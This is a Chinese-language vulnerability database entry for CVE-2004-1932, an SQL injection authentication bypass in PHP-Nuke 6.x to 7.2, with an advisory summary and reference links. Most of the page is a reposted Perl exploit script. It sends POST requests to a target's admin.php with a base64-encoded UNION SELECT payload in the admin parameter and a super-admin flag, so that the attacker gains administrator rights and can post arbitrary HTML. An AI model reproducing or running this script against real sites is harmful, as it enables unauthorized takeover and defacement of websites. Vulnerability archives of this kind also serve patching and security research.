PHP-NukeSQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108185 漏洞类型 SQL注入
发布时间 2004-09-16 更新时间 2004-09-16
CVE编号 CVE-2004-1932 CNNVD-ID CNNVD-200404-020
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/465
https://www.securityfocus.com/bid/82565
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-020
|漏洞详情
PHP-Nuke6.x到7.2版本中的文件(1)auth.php和(2)admin.php存在SQL注入漏洞。远程攻击者可以通过admin参数中的base64-encodedSQL执行任意的SQL代码和创建管理员帐户。
|漏洞EXP
#!/usr/bin/perl
#

use LWP; 

$log = "pos_komen_phpnuke_savemsg.txt"; 
$Agent = "Mbahmubangga/1.0";
$proxy = "http://172.9.1.11:80/"; # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);

$url = 'http://www.sitewithphpnuke.com/admin.php';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("\nProcessing: $url\n");

for ($a = 1; $a < 11 ; $a++) {

$mid=$a;

$loginpost = $url;
$loginrequest = HTTP::Request->new(POST => $loginpost);
$loginrequest->content_type('application/x-www-form-urlencoded');
$loginsend = 
'title=<h1>JUST TESTING</h1>'.
'&content=you can put HTML format here, all up to you now, 1 liner of course,
or multiple liner with dot'.
'&mlanguage='. #message language
'&expire=0'. #unlimited
'&active=1'. #yes
'&chng_date=0'.
'&view=1'. #all visitors
'&mdate='.
'&mid='.$mid. #the message id, commonly has value under 11
'&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. #our magic ammo ==> x'%20UNION%20SELECT%201/*:1
'&add_radminsuper=1'. #the super user / G O D
'&op=savemsg'; #operation
$loginrequest->content-length($loginsend);
$loginrequest->content($loginsend);
$loginresponse = $browser->request($loginrequest);
$logincek = $loginresponse->as_string;
#print ($logincek);


if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length Required)/){
printlog ("$mid attempting edit and saving message sending OK ".$loginresponse-
>status_line ."\n") ;
}
else {
printlog ("Could be failure ".$loginresponse->status_line ."\n");
last;
}

} #end of for

sub printlog {
print @_[0]; 
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}

# milw0rm.com [2004-09-16]
|受影响的产品
Francisco Burzi PHP-Nuke 7.2 Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 Final Francisco Burzi PHP-Nuke 7.0 Francisco Burzi PHP-Nuke 6.9 Francisco Burzi PHP
|参考资料

来源:XF
名称:phpnuke-admin-bypass-authentication(15835)
链接:http://xforce.iss.net/xforce/xfdb/15835
来源:www.waraxe.us
链接:http://www.waraxe.us/index.php?modname=sa&id=18
来源:BUGTRAQ
名称:20040412[waraxe-2004-SA#018-Admin-levelauthenticationbypassinphpnuke6.x-7.2]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108180334918576&w=2